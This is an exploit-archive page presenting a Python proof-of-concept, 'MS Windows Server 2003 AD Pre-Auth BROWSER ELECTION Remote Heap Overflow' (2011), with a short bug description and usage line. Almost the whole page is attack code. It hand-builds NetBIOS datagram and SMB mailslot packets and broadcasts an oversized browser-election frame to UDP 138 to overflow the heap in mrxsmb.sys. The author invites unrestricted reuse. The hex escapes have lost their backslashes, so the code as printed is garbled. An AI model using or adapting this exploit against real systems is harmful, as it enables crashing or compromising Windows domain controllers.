[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
# Published : 2011-02-14
# Author : Cupidon-3005
# Previous Title : ProFTPD mod_sftp Integer Overflow DoS PoC
# Next Title : Avira AntVir QUA file in (avcenter.exe) Local Crash PoC 


####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len = TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse this code without restrictions...

import socket,sys,struct
from socket import *

if len(sys.argv)<=4:    
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME 
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME""")

ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()


ELEC            = "x42x4fx00"
WREDIR          = "x41x41x00"

def encodename(nbt,service):
    final = 'x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) + ord('A')) for i in nbt])+((15 - len(nbt)) * str('x43x41'))+service
    return final

def lengthlittle(packet,addnum):
    length = struct.pack("<i", len(packet)+addnum)[0:2]
    return length

def lengthbig(packet,addnum):
    length = struct.pack(">i", len(packet)+addnum)[2:4]
    return length

def election(srcname):
    elec = "x08"
    elec+= "x09" #Be the boss or die
    elec+= "xa8x0fx01x20" #Be the boss or die
    elec+= "x1bxe9xa5x00" #Up time
    elec+= "x00x00x00x00" #Null, like SDLC
    elec+= srcname+"x00"
    return elec

def smbheaderudp(op="x25"):
    smbheader= "xffx53x4dx42"
    smbheader+= op 
    smbheader+= "x00"
    smbheader+= "x00"
    smbheader+= "x00x00"
    smbheader+= "x00"
    smbheader+= "x00x00"
    smbheader+= "x00x00"
    smbheader+= "x00x00x00x00x00x00x00x00" 
    smbheader+=  "x00x00"
    smbheader+= "x00x00"
    smbheader+= "x00x00"
    smbheader+= "x00x00"
    smbheader+= "x00x00"
    return smbheader


def trans2mailslot(tid="x80x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="MAILSLOTBROWSE",srcservice="x41x41x00",dstservice="x41x41x00",pbrowser=""):
    packetbrowser  =  pbrowser                             
    packetmailslot = "x01x00"                            
    packetmailslot+= "x00x00"                            
    packetmailslot+= "x02x00"                            
    packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
    packetmailslot+= namepipe +"x00"
    packetdatagram = "x11"
    packetdatagram+= "x02"
    packetdatagram+= tid 
    packetdatagram+= inet_aton(ip)
    packetdatagram+= "x00x8a"
    packetdatagram+= "x00xa7"
    packetdatagram+= "x00x00"
    packetdatagramname = encodename(sname,srcservice)
    packetdatagramname+= encodename(dname,dstservice)
    smbheader= smbheaderudp("x25")
    packetrans2 = "x11"
    packetrans2+= "x00x00" 
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= "x00x00"
    packetrans2+= "x00x00"
    packetrans2+= "x00"
    packetrans2+= "x00"
    packetrans2+= "x00x00"
    packetrans2+= "xe8x03x00x00"
    packetrans2+= "x00x00"
    packetrans2+= "x00x00"
    packetrans2+= "x00x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
    packetrans2+= "x03"
    packetrans2+= "x00"
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
    lengthcalc = packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal = packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc,0)
    packetrans2final = ''.join(packetotalength)
    return packetrans2final

def sockbroad(host,sourceservice,destservice,packet):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
   s.bind(('0.0.0.0', 138))
   try:
      packsmbheader = smbheaderudp("x25")
      buffer0 = trans2mailslot(tid="x80x22",ip=ourip,sname=srcname,dname=dstname,namepipe="MAILSLOTBROWSER",srcservice=sourceservice, dstservice=destservice, pbrowser=packet)
      s.sendto(buffer0,(host,138))
   except:
      print "expected SDL error:", sys.exc_info()[0]
      raise
 
sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between ~60->410)
print "Happy St-Valentine BitchesnMSFT found that one loooooooong time ago...."